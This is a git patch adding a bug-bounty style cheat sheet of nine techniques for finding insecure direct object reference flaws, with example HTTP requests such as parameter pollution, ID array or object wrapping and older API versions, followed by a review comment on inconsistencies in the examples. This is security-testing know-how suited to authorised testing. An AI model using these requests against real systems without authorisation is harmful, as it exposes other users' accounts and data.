From 233ec1f5b72071acc98227c1c4bf98fb63bd6ef1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Fri, 4 Sep 2020 17:41:20 +0700 Subject: [PATCH] Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips --- IDOR.md | 99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 IDOR.md diff --git a/IDOR.md b/IDOR.md new file mode 100644 index 0000000..99e246e --- /dev/null +++ b/IDOR.md @@ -0,0 +1,99 @@ +## IDOR (Insecure Direct Object Reference) + +1. Add parameters onto the endpoints for example, if there was +```html +GET /api/v1/getuser +[...] +``` +Try this to bypass +```html +GET /api/v1/getuser?id=1234 +[...] +``` + +2. HTTP Parameter pollution + +```html +POST /api/get_profile +[...] +user_id=hacker_id&user_id=victim_id +``` + +3. Add .json to the endpoint + +```html +GET /v2/GetData/1234 +[...] +``` +Try this to bypass +```html +GET /v2/GetData/1234.json +[...] +``` + +4. Test on outdated API Versions + +```html +POST /v2/GetData +[...] +id=123 +``` +Try this to bypass +```html +POST /v1/GetData +[...] +id=123 +``` + +5. Wrap the ID with an array. + +```html +POST /api/get_profile +[...] +{"user_id":111} +``` +Try this to bypass +```html +POST /api/get_profile +[...] +{"id":[111]} +``` + +6. Wrap the ID with a JSON object + +```html +POST /api/get_profile +[...] +{"user_id":111} +``` +Try this to bypass +```html +POST /api/get_profile +[...] +{"user_id":{"user_id":111}} +``` + +7. JSON Parameter Pollution + +```html +POST /api/get_profile +[...] +{"user_id":"hacker_id","user_id":"victim_id"} +``` + +8. Try decode the ID, if the ID encoded using md5,base64,etc +```html +GET /GetUser/dmljdGltQG1haWwuY29t +[...] +``` +dmljdGltQG1haWwuY29t => victim@mail.com + +9. If the website using graphql, try to find IDOR using graphql! +```html +GET /graphql +[...] +``` +```html +GET /graphql.php?query= +[...] +```
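Review bot: in tip 5 the "bypass" request changes the key name as well as the value shape (`{"user_id":111}` becomes `{"id":[111]}`), so the example no longer isolates the technique the heading describes ("Wrap the ID with an array"); keep the same key and show only the array wrapping, i.e. `{"user_id":[111]}`, as tip 6 correctly does for the object case. Two smaller consistency points in the same hunk: every request block is fenced as ```html although the content is a raw HTTP request line, so ```http would render and read correctly; and tip 8 says "decode the ID, if the ID encoded using md5,base64,etc" while the worked example (`dmljdGltQG1haWwuY29t => victim@mail.com`) is base64, which can be decoded, whereas MD5 is a one-way hash that can only be matched against known inputs, so the wording should separate "decode (base64, hex)" from "recognise a hash of a predictable value (md5)". Finally, the subject line reads "Account Takover" where "Takeover" is meant.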